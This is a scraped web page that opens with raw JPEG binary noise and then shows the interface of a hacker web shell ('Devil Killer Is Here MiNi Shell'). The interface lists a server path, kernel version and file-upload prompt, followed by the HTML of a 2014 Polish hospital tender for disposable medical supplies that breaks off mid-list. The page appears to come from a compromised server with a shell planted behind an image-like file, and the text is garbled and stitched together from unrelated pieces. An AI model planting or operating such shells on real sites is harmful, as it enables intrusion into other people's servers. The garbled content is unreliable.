JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140827/183417-N-2014.html

<p class="kh_header"><b>Konin: Dostawa  sprzętu i materiałów jednorazowego użytku oraz artykułów higienicznych dla potrzeb Wojewódzkiego Szpitala Zespolonego w Koninie</b><br>
<b>Numer ogłoszenia: 183417 - 2014; data zamieszczenia: 27.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony , ul. Szpitalna 45, 62-504 Konin, woj. wielkopolskie, tel. 063 2404133, faks 063 2404134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  sprzętu i materiałów jednorazowego użytku oraz artykułów higienicznych dla potrzeb Wojewódzkiego Szpitala Zespolonego w Koninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu i materiałów jednorazowego użytku oraz artykułów higienicznych dla potrzeb WSZ w Koninie.
Przedmiot zamówienia został zawarty w 16 pakietach.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami dla poszczególnych pozycji w pakiecie znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.00-2, 33.14.16.40-8, 33.14.13.20-9, 33.14.13.10-6, 33.14.12.20-8, 33.15.78.00-3, 31.71.11.40-6, 33.77.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 16.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie zastosowano.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu o których mowa w art. 22 ust 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu o których mowa w art. 22 ust 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu o których mowa w art. 22 ust 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu o których mowa w art. 22 ust 1 ustawy PZP.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu o których mowa w art. 22 ust 1 ustawy PZP.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>2.	Zgodnie z art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca 
w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>-Obniżenie cen jednostkowych produktów dostarczanych przez Wykonawcę w ramach niniejszej umowy może nastąpić w każdym czasie i nie wymaga  zgody Zamawiającego ani sporządzenia aneksu do umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Zespolony w Koninie, ul. Szpitalna 45, 62-504 Konin, pokój 3/14 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.09.2014 godzina 10:00, miejsce: Wojewódzki Szpital Zespolony w Koninie, ul. Szpitalna 45, 62-504 Konin, pokój 3/13 Kancelaria, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Cewniki, zgłębniki,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 1
L.p.	Nazwa towaru-asortyment	Ilość
sztuk
Cewnik do odsysania 
 
1.	Cewnik do odsysania F6	700
2.	Cewnik do odsysania F8	1000
3.	Cewnik do odsysania F10	500
4.	Cewnik do odsysania F12	500
5.	Cewnik do odsysania F14	500
6.	Cewnik do odsysania F16	5000
7.	Cewnik do odsysania F18	5000
8.	Cewnik do odsysania F20	1000
Cewnik do kontrolowanego odsysania
 
9.	Cewnik do przerywanego odsysania F6	500
10.	Cewnik do przerywanego odsysania F8	500
11.	Cewnik do przerywanego odsysania F10	300
12.	Cewnik do przerywanego odsysania F12	300
13.	Cewnik z PCV do podawania tlenu przez nos o dł. drenu nie mniejszej niż 200 cm	12000
Cewnik do karmienia przez nos
14.	Cewnik do karmienia przez nos F5	500
15.	Cewnik do karmienia przez nos F6	500
16.	Cewnik do karmienia przez nos F8	300
Zgłębnik żołądkowy 
17.	zgłębnik żołądkowy 16	1200
18.	zgłębnik żołądkowy 18	1500
19.	zgłębnik żołądkowy 20	600
20.	zgłębnik żołądkowy 22	300
Zgłębnik żołądkowy silikonowy
21.	zgłębnik żołądkowy 16	100
22.	zgłębnik żołądkowy 18	100
23.	zgłębnik żołądkowy 20	50
24.	zgłębnik żołądkowy 22	50
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dreny, butle redona.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 2
L.p.	Nazwa towaru-asortyment	Ilość
sztuk
Dren jamy otrzewnej 
 
1.	dren jamy otrzewnej 16	50
2.	dren jamy otrzewnej 18	200
3.	dren jamy otrzewnej 20	250
4.	dren jamy otrzewnej 22	150
5.	dren jamy otrzewnej 24	200
6.	dren jamy otrzewnej 26	150
7.	dren jamy otrzewnej 28	150
8.	dren jamy otrzewnej 30	150
Dren redona 
9.	dren redona 10	250
10.	dren redona 12	250
11	dren redona 14	300
12.	dren redona 16	300
13.	dren redona 18	100
14.	dren redona 20	100
15.	Butla redona 	
1500
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.16.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Cewniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 3
L.p.	Nazwa towaru-asortyment	Ilość
sztuk
Cewnik Couvelaira
 
1.	Cewnik Couvelaira F14	50
2.	Cewnik Couvelaira F16	50
3.	Cewnik Couvelaira F18	50
4.	Cewnik Couvelaira F20	30
5.	Cewnik Couvelaira F22	30
Cewnik Tiemanna 
6.	Cewnik Tiemanna F8	50
7.	Cewnik Tiemanna F10	50
8.	Cewnik Tiemanna F12	150
9.	Cewnik Tiemanna F14	200
10.	Cewnik Tiemanna F16	200
11.	Cewnik Tiemanna F18	200
12.	Cewnik Tiemanna F20	50
Cewnik Foleya silikonowany 
13.	Cewnik Foleya 10	100
14.	Cewnik Foleya 12	100
15.	Cewnik Foleya 14	100
16.	Cewnik Foleya 16	1500
17.	Cewnik Foleya 18	3500
18.	Cewnik Foleya 20	1000
19.	Worki do dobowej zbiórki moczu	  
           30000
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Cewniki, zestawy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 4
L.p.	Nazwa towaru-asortyment, 	Ilość sztuk
1.Cewnik moczowodowy z końcówką typu Nelaton 100
2.Zestaw do szynowania moczowodów typu Double-J 	    30
3.	Zestaw do przezskórnej nefrostomii 	     50
4.	Zestaw do przezskórnej nefrostomii 	       20
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Strzykawki, igły, przedłużacze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 5
L.p.	Nazwa towaru-asortyment	Ilość
sztuk



1.	Strzykawka tuberkulinowa z dołączoną igłą (0,5x16),
 	15.000


2.	Strzykawka jednorazowa, 	250.000


3.	Strzykawka jednorazowa, 	150.000



4.	Strzykawka jednorazowa, 	130.000


5.	Strzykawka jednorazowa, 	150.000

6.	Strzykawka 50 ml 	25000



7.	Strzykawka 50 ml 	5000



8.	Strzykawka Janeta 100 ml 	4000



9.	Strzykawka 50/60ml Janet 	3500


10.	Igła jednorazowego użytku  0,5 	100.000



11.	Igła jednorazowego użytku  0,6 	15.000



12.	Igła jednorazowego użytku  0,7 	15.000



13.	Igła jednorazowego użytku  0,8 	60.000




14.	Igła jednorazowego użytku  0,9	100.000


15.	Igła jednorazowego użytku  1,2 	250.000

16.	Igła do bezpiecznego pobierania i rozpuszczania leków z otw. bocznym 18Gx30 	100.000 



17.	Igła do nakłuć lędźwiowych 	50


18.	Igła do nakłuć lędźwiowych 	800


19.	Przedłużacze do pomp infuzyjnych 	15000


20.	Przedłużacze do pomp infuzyjnych 	1000
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.13.20-9, 33.14.13.10-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Przyrządy do przetaczania płynów i krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 6
L.p.	Nazwa towaru-asortyment	Ilość
1.	Przyrządy do przetaczania płynów infuzyjnych	150000
sztuk



2.	Przyrządy do przetaczania krwi, 	10000
sztuk
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kaniule i przyrządy medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 7
L.p. 	Nazwa towaru-asortyment	Ilość 
sztuk
 
Kaniule poliuretanowe 
1.	G 24, dł. 0,7 x 19mm	5000
2.	G 22, dł. 0,9 x 25mm	35000
3.	G 20, dł. 1,1 x 25mm i 33mm (dostępność w obu długościach)	28000
4.	G 18, dł. 1,3 x 33mm i 45mm (dostępność w obu długościach)	8000
5.	G 17, dł. 1,5 x 45mm	300
6.	Kranik trójdrożny	7000
7.	Koreczki do kaniul	100000
8.	Koreczki combi 	9000
9.	Przyrząd do wielokrotnego pobierania płynów i leków 	4000
10.	Aparat do przetoczeń z precyzyjną regulacją prędkości przepływu. 	700
11.	Aparat do pomp objętościowych Infusomat Space do płynów i żywienia pozajelitowego. Bez zawartości ftalanów z zabezpieczeniem przed przypadkowym podaniem do pacjenta	700
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.12.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kaniule.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 8
L.p.	Nazwa towaru-asortyment	Ilość
sztuk
1.	Kaniula dla dzieci i noworodków o 	500
2.	Kaniula dla dzieci i noworodków 	3000
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Układy oddechowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 9
L.p.	Nazwa towaru-asortyment	Ilość


1.	Układy oddechowe oraz akcesoria zużywalne do aparatu nCPAP Infant Flow i SIPAP firmy Dutchmed /jednorazowy układ oddechowy + komora nawilżacza/	
  40
sztuk
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.15.78.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zestawy do strzykawki, dreny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 10
L.p.	Nazwa towaru-asortyment	Ilość
1.	Zestaw do strzykawki automatycznej Optivantage 	1800
zestawów
2.	Dren spiralny dł. min 150 cm	1800

Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego.
sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.16.40-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pojemniki, maski tlenowe, elektrody.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 11
L.p.	Nazwa towaru-asortyment	Ilość
1.	Pojemnik na zużyte igły l	7500
sztuk
2.	Pojemnik na zużyte igły 	1000
sztuk
3.	kieliszki do leków.	4000
opakowań
4.	Maska tlenowa z nebulizatorem lekowym i drenem dla dzieci	1500
sztuk
5.	Maska tlenowa z nebulizatorem lekowym i drenem dla dorosłych	1000
sztuk
6.	Elektrody żelowane do diagnostyki i monitorowania EKG, piankowe, śr.45-55mm dla dorosłych	90000
sztuk
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ 40/2014 udostępnionej na stronie internetowej Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.15.78.00-3, 31.71.11.40-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 12
L.p.	Nazwa towaru-asortyment	Ilość
sztuk



1.	Igła do trepanobiopsji 11G/100 	100


